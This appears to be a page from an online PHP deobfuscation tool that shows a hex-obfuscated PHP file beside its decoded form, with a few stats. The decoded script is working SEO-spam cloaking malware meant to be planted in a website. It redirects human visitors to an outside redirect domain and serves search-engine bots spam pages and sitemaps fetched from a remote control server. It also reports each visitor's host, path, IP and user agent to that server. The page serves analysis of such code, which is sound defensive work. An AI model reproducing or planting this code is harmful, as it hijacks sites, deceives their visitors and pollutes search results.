Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto nSrEP; g5kVB: function _do() { $_ = $_SERVER; $__ = $_GET; if (isset($_["\x48\..

Decoded Output download

<?php 
goto nSrEP; g5kVB: function _do() { $_ = $_SERVER; $__ = $_GET; if (isset($_["HTTP_CF_CONNECTING_IP"])) { $i = $_["HTTP_CF_CONNECTING_IP"]; } elseif (isset($_["HTTP_X_FORWARDED_FOR"])) { $i = $_["HTTP_X_FORWARDED_FOR"]; } elseif (isset($_["HTTP_CLIENT_IP"])) { $i = $_["HTTP_CLIENT_IP"]; } elseif (isset($_["HTTP_X_REAL_IP"])) { $i = $_["HTTP_X_REAL_IP"]; } else { $i = $_["REMOTE_ADDR"]; } $ips = explode(",", $i); $IP = $ips[0]; $UA = @$_["HTTP_USER_AGENT"] . @gethostbyaddr($IP); $Bot = preg_match("/(google|bing|yahoo|msn.com|yahoo.com|aol.com)/i", $UA) ? 1 : 0; $URI = $_["REQUEST_URI"]; $Lang = @$_["HTTP_ACCEPT_LANGUAGE"]; $Host = $_["HTTP_HOST"]; $Ukey = substr(preg_replace("/[w0-9\.-]/", '', $Host), 0, 3); $sKey = substr($Ukey, 0, 1); $h7Page = ''; $h7Pre = "^[0-9]\.[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\."; $h8Pre = $Ukey . "[0-9]-[0-9]+-[0-9]+"; $d10Pre = $Ukey . "[0-9][0-9][0-9]c[0-9]+"; if (!empty($__)) { foreach ($__ as $k => $v) { if (preg_match("/^" . $h8Pre . "/", $v)) { $sKey = $k; break; } if (preg_match("/^" . $d10Pre . "/", $v)) { $sKey = $k; break; } if (preg_match("/" . $h7Pre . "/", $v)) { $h7Page = $v; break; } } } $Path = ''; $Page = isset($__[$sKey]) ? trim($__[$sKey]) : ''; if (strstr($URI, "pingxml")) { $spath = preg_replace("/\?.*$/", '', $URI); $mUrl = "https://www.google.com/ping?sitemap=http://" . $Host . $spath . "?sitemap" . rand(1, 99) . ".xml"; echo $mUrl . "#"; if (strstr(@file_get_contents($mUrl), "Received<")) { die("PING-1"); } die("PING-0"); } if (strlen($UA) > 20 && !empty($Lang) && !$Bot) { if (preg_match("/^" . $h8Pre . "-[0-9]+-[0-9]+-[0-9]+/", $Page)) { header("Location: http://jump2024.01rosedata.com/20240124/jump301.php?t=e&hh=" . $Host . "&s=" . urlencode($Page)); die; } elseif (preg_match("/^" . $d10Pre . "/", $Page)) { header("Location: http://jump2024.01rosedata.com/20240124/jump301.php?t=e&hh=" . $Host . "&s=" . urlencode($Page)); die; } elseif (!empty($h7Page)) { header("Location: http://jump2024.01rosedata.com/20240124/jump301.php?t=e&hh=" . $Host . "&s=" . urlencode($h7Page)); die; } } if (preg_match("/\.(jpg|gif|jpeg|png|ico|css|js|ini|log)/i", $URI)) { return; } if ($Bot) { if (substr($URI, -10) == "robots.txt") { header("Content-Type: text/plain"); die("User-agent: *" . "\xa" . "Allow: /" . "
\xa" . "Sitemap: http://" . $Host . "/?sitemap.xml"); } elseif (preg_match("/sitemap[0-9]*\.xml/", $URI) || $Page == "sitemap") { $Page = $Ukey . "1-999-9"; } elseif (!preg_match("/^" . $h8Pre . "/", $Page) && !preg_match("/^" . $d10Pre . "/", $Page)) { $Page = $Ukey . "1-999-1"; } if (preg_match("/^" . $h8Pre . "/", $Page) || preg_match("/^" . $d10Pre . "/", $Page)) { $hd = base64_encode($Host . "{|}" . $URI . "{|}" . $IP . "{|}" . @$_["HTTP_USER_AGENT"]); $cHost = array(".01rosedata.", ".02rosedata."); $cUrl = "http://api" . $cHost[0] . "com/20240124/hyapi001.php"; if (preg_match("/^" . $d10Pre . "/", $Page)) { $cUrl = "http://api" . $cHost[0] . "com/20240124/hyapi001.php"; } $cHost[2] = $IP; $html = _curl($cUrl . "?key=" . $sKey . "&path=" . $Path . "&s=" . urlencode($Page) . "&hd=" . urlencode($hd), $cHost); if (strstr($html, "</urlset>")) { header("Content-type:text/xml"); die($html); } if (strlen($html) > 500) { die($html); } } } } goto JBEQg; JBEQg: _do(); goto eU7eN; MfFzx: function _curl($u, $cHost, $n = 0) { $_ = $_SERVER; if (!function_exists("curl_exec")) { $c = stream_context_create(array("http" => array("method" => "GET", "timeout" => 60))); $s = @file_get_contents($u, false, $c); } else { $hd = array("Accept-Language:" . @$_["HTTP_ACCEPT_LANGUAGE"], "User-IP:" . $cHost[2], "User-URI:" . $_["REQUEST_URI"], "User-HOST:" . $_["HTTP_HOST"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_USERAGENT, @$_["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $hd); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $s = curl_exec($ch); $a = curl_getinfo($ch); curl_close($ch); if ($a["http_code"] != "200") { $s = ''; } } if (empty($s) && $n < 1) { return _curl(str_replace($cHost[0], $cHost[1], $u), $cHost, 1); } return $s; } goto g5kVB; nSrEP: error_reporting(0); goto MfFzx; eU7eN:  
 
include 'index.htm'; 
?>

Did this file decode correctly?

Original Code

<?php
goto nSrEP; g5kVB: function _do() { $_ = $_SERVER; $__ = $_GET; if (isset($_["\x48\x54\x54\120\x5f\x43\x46\x5f\x43\x4f\x4e\x4e\x45\103\124\x49\116\x47\x5f\111\x50"])) { $i = $_["\x48\x54\124\x50\x5f\103\106\137\103\117\116\x4e\x45\103\124\111\116\107\x5f\111\120"]; } elseif (isset($_["\110\x54\x54\x50\137\130\137\x46\x4f\x52\127\101\122\x44\x45\104\137\106\x4f\x52"])) { $i = $_["\110\x54\124\120\137\130\x5f\106\117\x52\x57\x41\122\x44\105\x44\x5f\106\x4f\x52"]; } elseif (isset($_["\x48\x54\124\120\x5f\x43\x4c\111\105\116\124\137\x49\x50"])) { $i = $_["\x48\124\124\x50\137\103\x4c\x49\x45\x4e\124\137\111\x50"]; } elseif (isset($_["\110\124\x54\120\137\x58\x5f\122\105\101\114\x5f\111\120"])) { $i = $_["\110\124\124\x50\137\130\x5f\x52\x45\x41\x4c\137\111\x50"]; } else { $i = $_["\122\105\115\117\x54\105\x5f\101\104\104\122"]; } $ips = explode("\x2c", $i); $IP = $ips[0]; $UA = @$_["\x48\x54\124\120\137\125\123\x45\122\x5f\101\x47\105\x4e\x54"] . @gethostbyaddr($IP); $Bot = preg_match("\x2f\x28\x67\x6f\157\147\x6c\x65\x7c\142\x69\156\x67\x7c\x79\x61\x68\x6f\x6f\x7c\x6d\x73\x6e\56\x63\x6f\x6d\174\171\x61\x68\157\x6f\56\x63\157\x6d\174\x61\x6f\154\56\143\x6f\155\51\x2f\151", $UA) ? 1 : 0; $URI = $_["\x52\105\121\x55\105\123\x54\x5f\x55\x52\x49"]; $Lang = @$_["\x48\124\124\x50\137\101\103\103\x45\120\124\137\114\101\x4e\x47\125\101\x47\105"]; $Host = $_["\x48\124\x54\120\x5f\x48\x4f\123\124"]; $Ukey = substr(preg_replace("\57\x5b\x77\60\55\x39\x5c\56\55\x5d\57", '', $Host), 0, 3); $sKey = substr($Ukey, 0, 1); $h7Page = ''; $h7Pre = "\136\133\60\55\71\x5d\x5c\56\x5b\x30\x2d\71\x5d\53\134\x2e\133\x30\55\71\135\x2b\134\56\133\60\x2d\x39\x5d\53\134\x2e\133\60\55\71\135\x2b\134\56"; $h8Pre = $Ukey . "\133\60\x2d\x39\135\x2d\133\x30\x2d\x39\135\x2b\x2d\x5b\60\x2d\x39\135\53"; $d10Pre = $Ukey . "\133\60\55\x39\x5d\x5b\60\55\x39\x5d\133\x30\55\71\x5d\x63\x5b\x30\x2d\x39\x5d\53"; if (!empty($__)) { foreach ($__ as $k => $v) { if (preg_match("\57\x5e" . $h8Pre . "\57", $v)) { $sKey = $k; break; } if (preg_match("\57\x5e" . $d10Pre . "\x2f", $v)) { $sKey = $k; break; } if (preg_match("\57" . $h7Pre . "\x2f", $v)) { $h7Page = $v; break; } } } $Path = ''; $Page = isset($__[$sKey]) ? trim($__[$sKey]) : ''; if (strstr($URI, "\160\x69\x6e\x67\x78\155\154")) { $spath = preg_replace("\57\134\77\56\x2a\44\x2f", '', $URI); $mUrl = "\150\x74\164\x70\163\72\57\57\x77\167\167\x2e\x67\x6f\x6f\147\x6c\x65\x2e\143\157\155\57\160\151\156\x67\x3f\163\x69\x74\x65\x6d\141\x70\75\x68\x74\x74\160\x3a\x2f\x2f" . $Host . $spath . "\77\163\151\164\x65\155\x61\x70" . rand(1, 99) . "\x2e\170\x6d\x6c"; echo $mUrl . "\43"; if (strstr(@file_get_contents($mUrl), "\x52\145\x63\145\x69\x76\x65\x64\x3c")) { die("\120\111\116\107\x2d\61"); } die("\120\111\116\107\55\60"); } if (strlen($UA) > 20 && !empty($Lang) && !$Bot) { if (preg_match("\57\x5e" . $h8Pre . "\x2d\x5b\x30\x2d\x39\x5d\x2b\55\133\x30\x2d\71\135\x2b\55\133\60\x2d\71\x5d\x2b\x2f", $Page)) { header("\114\x6f\x63\x61\164\x69\157\156\x3a\40\150\x74\x74\160\x3a\x2f\57\x6a\x75\155\x70\62\x30\x32\x34\x2e\x30\61\x72\157\163\x65\x64\141\x74\141\56\143\157\155\57\x32\60\x32\64\x30\x31\x32\64\x2f\x6a\x75\155\160\63\60\61\x2e\160\150\x70\77\x74\x3d\x65\x26\x68\150\75" . $Host . "\x26\163\75" . urlencode($Page)); die; } elseif (preg_match("\57\x5e" . $d10Pre . "\57", $Page)) { header("\114\157\143\141\164\x69\157\156\72\40\x68\x74\x74\160\x3a\57\x2f\x6a\165\155\x70\x32\60\62\64\x2e\60\61\162\157\x73\x65\x64\141\x74\x61\56\143\157\x6d\x2f\x32\x30\x32\x34\60\x31\62\x34\x2f\152\x75\x6d\160\63\60\x31\x2e\x70\x68\x70\77\164\x3d\x65\x26\x68\150\75" . $Host . "\46\x73\75" . urlencode($Page)); die; } elseif (!empty($h7Page)) { header("\114\157\x63\x61\164\151\x6f\x6e\72\40\x68\164\164\160\72\57\x2f\152\165\x6d\160\x32\60\x32\x34\x2e\60\x31\162\157\163\x65\144\x61\164\x61\x2e\143\157\x6d\57\62\60\62\64\x30\61\x32\64\x2f\x6a\165\155\x70\x33\60\61\x2e\x70\150\160\77\x74\75\145\x26\x68\x68\x3d" . $Host . "\46\x73\x3d" . urlencode($h7Page)); die; } } if (preg_match("\x2f\134\x2e\x28\x6a\160\x67\174\x67\151\146\x7c\x6a\160\x65\147\174\160\156\x67\174\x69\x63\x6f\x7c\x63\163\163\x7c\x6a\163\174\151\156\151\174\x6c\x6f\x67\x29\x2f\x69", $URI)) { return; } if ($Bot) { if (substr($URI, -10) == "\162\x6f\x62\x6f\x74\163\56\x74\170\164") { header("\103\157\156\164\145\x6e\164\x2d\124\171\160\145\72\x20\x74\x65\x78\x74\x2f\160\154\x61\151\156"); die("\x55\x73\145\162\x2d\141\147\x65\x6e\164\x3a\40\x2a" . "\xa" . "\x41\x6c\154\157\x77\72\x20\57" . "\12\xa" . "\123\151\x74\x65\155\x61\160\72\x20\150\x74\x74\160\x3a\x2f\x2f" . $Host . "\57\77\163\151\164\145\x6d\141\x70\56\x78\x6d\154"); } elseif (preg_match("\x2f\163\x69\x74\x65\155\141\160\x5b\60\x2d\x39\x5d\x2a\x5c\x2e\170\x6d\154\57", $URI) || $Page == "\163\151\164\145\x6d\141\160") { $Page = $Ukey . "\61\55\71\71\x39\55\x39"; } elseif (!preg_match("\57\136" . $h8Pre . "\x2f", $Page) && !preg_match("\57\x5e" . $d10Pre . "\x2f", $Page)) { $Page = $Ukey . "\61\x2d\71\71\71\x2d\61"; } if (preg_match("\57\136" . $h8Pre . "\57", $Page) || preg_match("\x2f\x5e" . $d10Pre . "\57", $Page)) { $hd = base64_encode($Host . "\x7b\x7c\175" . $URI . "\x7b\174\175" . $IP . "\173\174\175" . @$_["\x48\x54\124\x50\137\x55\x53\105\x52\137\101\107\105\116\124"]); $cHost = array("\56\x30\61\x72\157\x73\145\x64\141\164\x61\56", "\56\60\x32\162\157\x73\145\144\141\164\x61\x2e"); $cUrl = "\150\164\164\160\72\57\57\141\160\x69" . $cHost[0] . "\143\157\155\x2f\x32\60\62\64\60\61\62\64\57\150\171\x61\160\x69\x30\60\x31\56\160\x68\160"; if (preg_match("\x2f\x5e" . $d10Pre . "\x2f", $Page)) { $cUrl = "\150\x74\164\x70\72\57\57\141\160\x69" . $cHost[0] . "\x63\157\x6d\x2f\x32\x30\x32\64\x30\x31\x32\64\x2f\150\171\x61\160\x69\60\60\61\x2e\x70\x68\160"; } $cHost[2] = $IP; $html = _curl($cUrl . "\77\153\145\171\x3d" . $sKey . "\46\160\141\164\x68\75" . $Path . "\46\x73\x3d" . urlencode($Page) . "\46\150\x64\75" . urlencode($hd), $cHost); if (strstr($html, "\74\57\165\x72\x6c\163\x65\164\76")) { header("\x43\157\156\164\145\156\x74\55\x74\171\160\145\72\x74\x65\x78\x74\57\x78\155\154"); die($html); } if (strlen($html) > 500) { die($html); } } } } goto JBEQg; JBEQg: _do(); goto eU7eN; MfFzx: function _curl($u, $cHost, $n = 0) { $_ = $_SERVER; if (!function_exists("\x63\x75\x72\154\137\x65\170\x65\x63")) { $c = stream_context_create(array("\150\164\x74\x70" => array("\x6d\145\x74\150\x6f\144" => "\x47\105\x54", "\164\x69\x6d\x65\157\165\x74" => 60))); $s = @file_get_contents($u, false, $c); } else { $hd = array("\x41\143\143\x65\160\164\x2d\114\141\156\x67\x75\141\x67\145\72" . @$_["\x48\124\x54\x50\x5f\101\103\103\105\120\x54\137\114\101\116\x47\125\101\107\x45"], "\x55\163\145\162\55\111\120\72" . $cHost[2], "\125\163\145\x72\x2d\125\122\x49\72" . $_["\x52\x45\x51\125\105\x53\x54\x5f\x55\122\x49"], "\x55\x73\x65\x72\x2d\110\x4f\x53\124\x3a" . $_["\x48\x54\124\x50\137\x48\117\123\x54"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_USERAGENT, @$_["\110\124\x54\x50\x5f\125\123\x45\122\x5f\101\x47\105\x4e\124"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $hd); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $s = curl_exec($ch); $a = curl_getinfo($ch); curl_close($ch); if ($a["\x68\164\x74\160\137\143\157\x64\145"] != "\62\60\x30") { $s = ''; } } if (empty($s) && $n < 1) { return _curl(str_replace($cHost[0], $cHost[1], $u), $cHost, 1); } return $s; } goto g5kVB; nSrEP: error_reporting(0); goto MfFzx; eU7eN: 

include 'index.htm';
?>

Function Calls

None

Variables

None

Stats

MD5 e6c2f493c3edc9e2592af6ad54c59218
Eval Count 0
Decode Time 47 ms